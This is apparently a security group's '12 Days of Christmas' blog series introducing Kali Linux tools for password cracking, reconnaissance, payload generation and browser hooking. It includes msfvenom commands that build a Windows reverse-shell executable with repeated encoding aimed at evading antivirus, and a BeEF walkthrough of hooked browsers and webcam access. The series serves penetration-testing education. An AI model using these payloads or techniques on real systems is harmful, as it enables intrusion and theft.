Division Zero (Div0). Copyright © 2011-2018

All rights reserved.

12 Days of Christmas, Edgis Style

It's December. Christmas is round the corner. Hooray! We will be celebrating 12 Days of Christmas (Edgis Style). For a period of 12 days, we will be making a post each day on a useful tool that can be found in Kali Linux.


12 Days of Christmas

  • Day 1: CeWL

  • Day 2: Password Mutation using John the Ripper

  • Day 3: Hash Identification

  • Day 4: Using Online Hash Databases

  • Day 5: Zone Transfer Tool

  • Day 6: recon-ng

  • Day 7: urlcrazy

  • Day 8: searchsploit

  • Day 9: msfvenom

  • Day 10: nmap Scripting Engine (NSE)

  • Day 11: theharvester

  • Day 12: BeEF


Day 1: CeWL

The first tool to be introduced is CeWL (Custom Word List Generator). CeWL crawls a target website and returns all the unique words found on the site.

CeWL can be run directly from the terminal in Kali Linux by issuing the command:

cewl <target-site>

By default, this command crawls the target site to a maximum depth of 2 and returns only words that are at least 3 characters long.


To view all the options available in cewl, issue the command:

cewl --help

Some of the other useful options are:
-w / --write <filename>: Write the output to a file
-d / --depth <int>: Set the depth for CeWL to crawl (default 2)
-m / --min_word_length <int>: The minimum word length (default 3)
-e / --email_file <filename>: Output email addresses to a file


Day 2: Password Mutation using John the Ripper

Previously, using CeWL, we generated a wordlist by crawling a website. However, this wordlist on its own may not be very useful for brute-forcing passwords, as users commonly append a few digits to a base word. E.g. "password" may be mutated by the user to "password01".

John the Ripper can help generate a new wordlist that includes such mutations. To do that, new rules need to be created in the configuration file. By default, the configuration file is located at /etc/john.conf. To add a new rule, simply append the rule section to the configuration file.

To define a rule set that appends a digit to each word in the wordlist, append the following to the configuration file:

[List.Rules:AppendDigit]
$[0-9]

To define a rule set that appends 2 digits to each word in the wordlist, append the following to the configuration file:

[List.Rules:AppendDigits]
$[0-9]$[0-9]

To define a rule set that appends one of a pre-defined set of symbols to each word in the wordlist, append the following to the configuration file:

[List.Rules:AppendSymbol]
$[@#$%&*]


To prepend instead of append, simply replace '$' with '^'.

Lastly, to generate the new wordlist with the password mutations applied, use the following command in the terminal:

john --wordlist=[path to the wordlist] --stdout --rules:[rule set name] > [generated wordlist file path]

E.g.:

john --wordlist=wordlist --stdout --rules:AppendDigits > newWordList

Looking at the new wordlist, you will notice that 2 extra digits have been appended to each word. This also increases the size of the wordlist: with AppendDigits, every original word becomes 100 candidates (suffixes 00 to 99).
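As an added illustration (not part of the original post and not John's own code), the following Python interprets the append/prepend rule subset shown above, and then turns the same idea around for the defender: a password-policy check that rejects a dictionary word with digits or symbols bolted onto either end. CEWL_WORDS is a constructed stand-in for the CeWL output.

```python
import re

# One John rule token: '$' (append) or '^' (prepend) followed by either a
# bracketed character class such as [0-9] or [@#$%&*], or a single literal.
_TOKEN = re.compile(r"([$^])(?:\[([^\]]+)\]|(.))")


def _charset(spec):
    """Expand a class body like '0-9' or '@#$%&*' into its member characters."""
    chars, i = [], 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":        # a-z style range
            chars.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            chars.append(spec[i])
            i += 1
    return chars


def apply_rule(word, rule):
    """Return every candidate John emits for `word` under `rule`.

    Only the $ / ^ subset from the post is supported. Tokens apply left to
    right, so '^[0-9]^[0-9]' puts the second digit in front of the first,
    matching John's behaviour."""
    candidates = [word]
    for op, bracket, literal in _TOKEN.findall(rule):
        chars = _charset(bracket) if bracket else [literal]
        if op == "$":
            candidates = [w + c for w in candidates for c in chars]
        else:
            candidates = [c + w for w in candidates for c in chars]
    return candidates


# The digit and symbol sets used by the AppendDigit(s) / AppendSymbol rules.
MUTATION_CHARS = "0123456789@#$%&*"


def is_mutated_dictionary_word(candidate, wordlist):
    """Policy check: True if the password is a known word with digits or
    symbols from MUTATION_CHARS bolted onto either end, which is exactly the
    space the rules above enumerate."""
    core = candidate.strip(MUTATION_CHARS)
    return bool(core) and core.lower() in wordlist


# Constructed stand-in for the CeWL output (lower-cased, one word per entry).
CEWL_WORDS = {"password", "edgis", "division", "christmas"}
```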


Day 3: Hash Identification

It is useful to identify the hash algorithm behind a given digest, as this reduces the search space when cracking passwords. In Kali, hash-identifier can help predict the hash algorithm used to derive a given digest.

The usage is simple. The user just needs to input the digest, and hash-identifier will attempt to guess the hash algorithm used. It then provides a list of the most likely hash algorithms, followed by less likely ones.


Demo

Original text: edgis
CRC32: 131f42b9
MD5: e362e35b7efc8910054871b0a8edb007
SHA-1: b58cba8c669711d9bb979eae8eaa8c7e255e58b5
SHA-256: c826002aac59efc150b847125b08adb790f3182408a241f99529144b48671bdf
Tiger: d9c78330bce66fe05c0540f79cb6c6ac435c1e7bbb4351e0


Day 4: Using Online Hash Databases

After identifying the hash algorithm, we can now try to crack the digest. One useful tool found in Kali Linux is findmyhash. findmyhash looks up a given digest in several online databases. Once it finds a match, it stops and returns the corresponding plaintext from which the digest was derived.

findmyhash <hash algorithm> -h <hash>


Demo

Original text: password
MD5: 5f4dcc3b5aa765d61d8327deb882cf99
SHA-1: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

Do note that this process may take some time and may not yield any result (if the digest cannot be found in any of the online databases used by findmyhash).
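Added example (not from the original post or from either tool) showing in Python what Day 3 and Day 4 rely on: hash-identifier's guess is essentially a lookup by digest length, and findmyhash can only succeed because the digest is an unsalted hash of a common word. The candidate table covers a few more same-length algorithms than the demo lists, and the word list is constructed; the last function shows the salted, slow-hash storage that defeats such lookups.

```python
import hashlib
import os

# Candidate algorithms per hex-digest length, which is how hash-identifier
# guesses: same-length algorithms cannot be told apart, so all are listed.
# (Constructed subset for this example; the tool's own table is much longer.)
CANDIDATES_BY_LENGTH = {
    8: ["CRC32"],
    32: ["MD5", "MD4", "NTLM"],
    40: ["SHA-1", "RIPEMD-160"],
    48: ["Tiger-192"],
    64: ["SHA-256"],
}


def identify(digest):
    """Return the candidate algorithms for a hex digest ([] if it is not hex)."""
    d = digest.strip().lower()
    if not d or any(c not in "0123456789abcdef" for c in d):
        return []
    return CANDIDATES_BY_LENGTH.get(len(d), [])


# Stand-in for an online hash database: unsalted digests of common words,
# precomputed once. The real services simply hold billions of such rows.
COMMON_WORDS = ["password", "edgis", "letmein", "qwerty"]
LOOKUP = {
    hashlib.new(algo, word.encode()).hexdigest(): (algo, word)
    for word in COMMON_WORDS
    for algo in ("md5", "sha1", "sha256")
}


def lookup(digest):
    """What findmyhash does, but offline: (algorithm, plaintext) or None."""
    return LOOKUP.get(digest.strip().lower())


def store_password(password, salt=None, rounds=100_000):
    """Defender's side: a random per-user salt and a slow KDF give every user
    a unique stored value, so no precomputed table can contain it."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return salt.hex() + "$" + dk.hex()
```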


Day 5: Zone Transfer Tool

Misconfigured DNS can often lead to exposure of data. One such example is the use of DNS zone transfers to discover information about an organisation. dig and host can be used to request a zone transfer. In Kali Linux, zone transfer is made even easier with dnsenum.

dnsenum <target domain>

There are many options available in dnsenum. Some of the useful ones are:

-t / --timeout <value>: TCP and UDP timeout in seconds
--threads <value>: Set the number of threads used to perform the different queries

To view more options, use -h / --help.
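Added example, not from the original post or from dnsenum: a Python check a defender can run against their own authoritative servers to confirm that AXFR is refused, parsing the text dig prints and flagging any internal hostnames an open transfer would expose. The two sample outputs, ns1.example.com and example.com are constructed; check_zone is a hypothetical helper that needs network access.

```python
import ipaddress
import subprocess

# Constructed sample outputs of `dig @ns1.example.com example.com AXFR`:
# one server that hands over the zone, one that refuses.
SAMPLE_OPEN = """\
; <<>> DiG 9.18.0 <<>> @ns1.example.com example.com AXFR
example.com.\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
example.com.\t3600\tIN\tNS\tns1.example.com.
www.example.com.\t300\tIN\tA\t192.0.2.10
intranet.example.com.\t300\tIN\tA\t10.0.0.5
example.com.\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
;; XFR size: 5 records (messages 1, bytes 211)
"""
SAMPLE_REFUSED = """\
; <<>> DiG 9.18.0 <<>> @ns1.example.com example.com AXFR
; Transfer failed.
"""

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_axfr(dig_output):
    """Return (transferred, records) from dig's AXFR text. records holds
    (name, type, rdata) tuples; a refused transfer prints only ';' comment
    lines, so it yields (False, [])."""
    records = []
    for line in dig_output.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        fields = line.split(None, 4)          # name ttl class type rdata
        if len(fields) == 5 and fields[2] == "IN":
            records.append((fields[0], fields[3], fields[4]))
    return (len(records) > 0, records)


def leaked_internal_hosts(records):
    """Names whose A records point into RFC 1918 space: the internal hostnames
    an open zone transfer exposes to anyone who asks."""
    return [name for name, rtype, rdata in records
            if rtype == "A" and any(ipaddress.ip_address(rdata) in net for net in RFC1918)]


def check_zone(nameserver, zone):
    """Run the real query against one of your own authoritative servers
    (hypothetical helper; needs network access, so it is not exercised here)."""
    out = subprocess.run(["dig", "@" + nameserver, zone, "AXFR"],
                         capture_output=True, text=True, check=False).stdout
    return parse_axfr(out)
```

A server that is configured correctly restricts transfers to its secondaries (for example BIND's allow-transfer), so check_zone should report (False, []) for every public nameserver of the zone.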


Day 6: recon-ng

recon-ng is a powerful, full-featured web reconnaissance framework. Its usage is very similar to the Metasploit Framework (MSF).

(Screenshot not reproduced.) There you go: contact details of the domain name holder.


There are a lot of modules to explore. Some of the more interesting ones:

recon/companies-contacts/facebook

recon/creds-creds/leakdb

recon/domain-creds/pwnedlist/leaks_dump

recon/hosts-hosts/ip_neighbor

recon/locations-locations/reverse_geocode


Have fun "recon-ing". :D


Day 7: urlcrazy

urlcrazy is a tool in Kali Linux that generates and tests domain name typos and variations in order to detect typosquatting, URL hijacking, phishing and corporate espionage.


Day 8: searchsploit

searchsploit makes searching the local exploit archive shipped with Kali Linux very easy.

By specifying a keyword, searchsploit returns matching results and the file path to the exploit.


Day 9: msfvenom

msfvenom is the successor of msfpayload and msfencode. Both msfpayload and msfencode are slated for retirement in the near future (June 2015). msfvenom consolidates the features of its predecessors and standardises their usage.


msfvenom is able to (1) generate various types of shellcode (the feature set of msfpayload) and (2) encode shellcode into formats that can be easily deployed onto targets (the feature set of msfencode).

To show available output formats:

msfvenom --help-formats

Executable Formats: asp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war

Transform Formats: bash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript


Demo: Generate Payload (windows/shell/reverse_tcp)

In this payload, we will need to define both LHOST and LPORT. In this demo, I will set it as 192.168.1.100 and 5555 respectively, and output the payload in Python format.

Many times, there may be bad characters in the payload that will cause the exploit to fail. One such example is \x00, the null byte. To have the encoder avoid them, we can use the -b option.

We can also output the payload in executable format:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -f exe > shell-exe

Note: In this case, 1 round of shikata_ga_nai encoding is applied automatically. shikata_ga_nai is a polymorphic XOR additive feedback encoder. We can do extra encoding to evade antivirus detection. To encode the payload with shikata_ga_nai 10 times:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe > shell-exe

Now let us upload these 2 executables to VirusTotal and see the effect of the encoding.

VirusTotal Result for Executable with 1 Round of Encoding

VirusTotal Result for Executable with 10 Round of Encoding

Notice that both payloads yield almost the same detection rate? This is because most antivirus vendors know the executable templates used by Metasploit, so extra rounds of encoding the shellcode inside them change little.


Day 10: nmap Scripting Engine (NSE)

The nmap Scripting Engine (NSE) provides many scripts that can be used in a network penetration test. It allows users to write and automate networking tasks. It was designed with the following uses in mind (http://nmap.org/book/nse.html#nse-intro):

  • Network Discovery

  • More Sophisticated Version Detection

  • Vulnerability Detection

  • Backdoor Detection

  • Vulnerability Exploitation

A list of available scripts can be found in the nmap documentation (http://nmap.org/nsedoc/).


Day 11: theharvester

Written by Christian Martorella from Edge Security, theharvester is a tool (written in Python) that can help penetration testers understand their target’s footprint on the Internet. It does so by gathering emails, subdomains, hosts, employee names, open ports and banners from different public sources such as search engines, PGP key servers and SHODAN computer database.

theharvester comes preinstalled on Kali Linux. It can also be obtained from GitHub: https://github.com/laramies/theHarvester

~$ git clone https://github.com/laramies/theHarvester.git

As theharvester uses public sources, it is important to always use the latest version for effective results.


Day 12: BeEF

BeEF (Browser Exploitation Framework) is a penetration testing framework that focuses on the Web browser. BeEF is a very powerful penetration testing framework, as it looks past the hardened network and host system and examines exploitability directly via your system’s open window, i.e. the Web browser.


Installation

As with all the other tools we’ve discussed thus far, BeEF is readily available in Kali Linux. Nonetheless, you can acquire BeEF from its GitHub repository. You can find installation instructions in either its INSTALL.txt file or its Wiki page. If you are impatient and using a Debian- or Red Hat-based distro, you can make use of its installation script (install-beef), although I strongly encourage you to read through the script prior to running it.


BeEF Architecture

BeEF has two major components:

  • The user interface, which allows users to see all online and offline browsers it has hooked, and to run exploits and information gathering against them.

  • The communication server, which communicates with the hooked browsers via HTTP.


Configuring and Running BeEF

All the main configurations of BeEF can be performed by modifying the config.yaml file. Some main configurations you should look into are:

  • Network limitations

  • Web server configuration

  • Extensions


If you examine the extensions section closely, you will realise you can configure BeEF to make use of Metasploit as well. If you are all set, start up your BeEF!

As you can see from here, I’m running my ‘Web service’ from 192.168.98.128, and only allowing access to the user interface from 127.0.0.1 (localhost).

Browser Hooking using BeEF

BeEF simply hooks browsers that visit the Web pages it serves. Here I have 4 hosts hooked onto my BeEF.

  • 192.168.98.129 is a Damn Vulnerable Linux machine.

  • 192.168.98.130 is a Windows XP machine with no service pack.

  • 192.168.98.131 is a Windows XP SP3 machine.

  • 192.168.98.1 is a hardened Windows 7 machine (fully patched, and Kaspersky Antivirus installed).

The user interface is pretty self-explanatory. Here you can look at the browser and host information of the machines BeEF has hooked.

And a list of things you can do to it (Green means it will work, Amber means the user may detect it, and Red means it won’t work).

It’s not just things you can do within the browser, but the host as well.

Here’s what you can do on a Linux machine using Firefox.

To demonstrate the magnificence of BeEF, here’s what you can do to a hardened Windows 7 machine. The antivirus did not even make a sound.

I tried using the Webcam feature. Although it asked for permission to access my Webcam, I’m sure there are definitely users out there who will click ‘allow’ without thinking too much about it. It of course switched on my Webcam. See that tiny light?

Defence against BeEF

Common sense: do not visit unsolicited Web sites.

That’s about it from me…

It is not possible to cover every single aspect of BeEF in one short post; however, it is definitely an amazing tool to look into for our very last episode of Edgis’s 12 Days of Christmas. To learn more about BeEF, please visit its Wiki page.
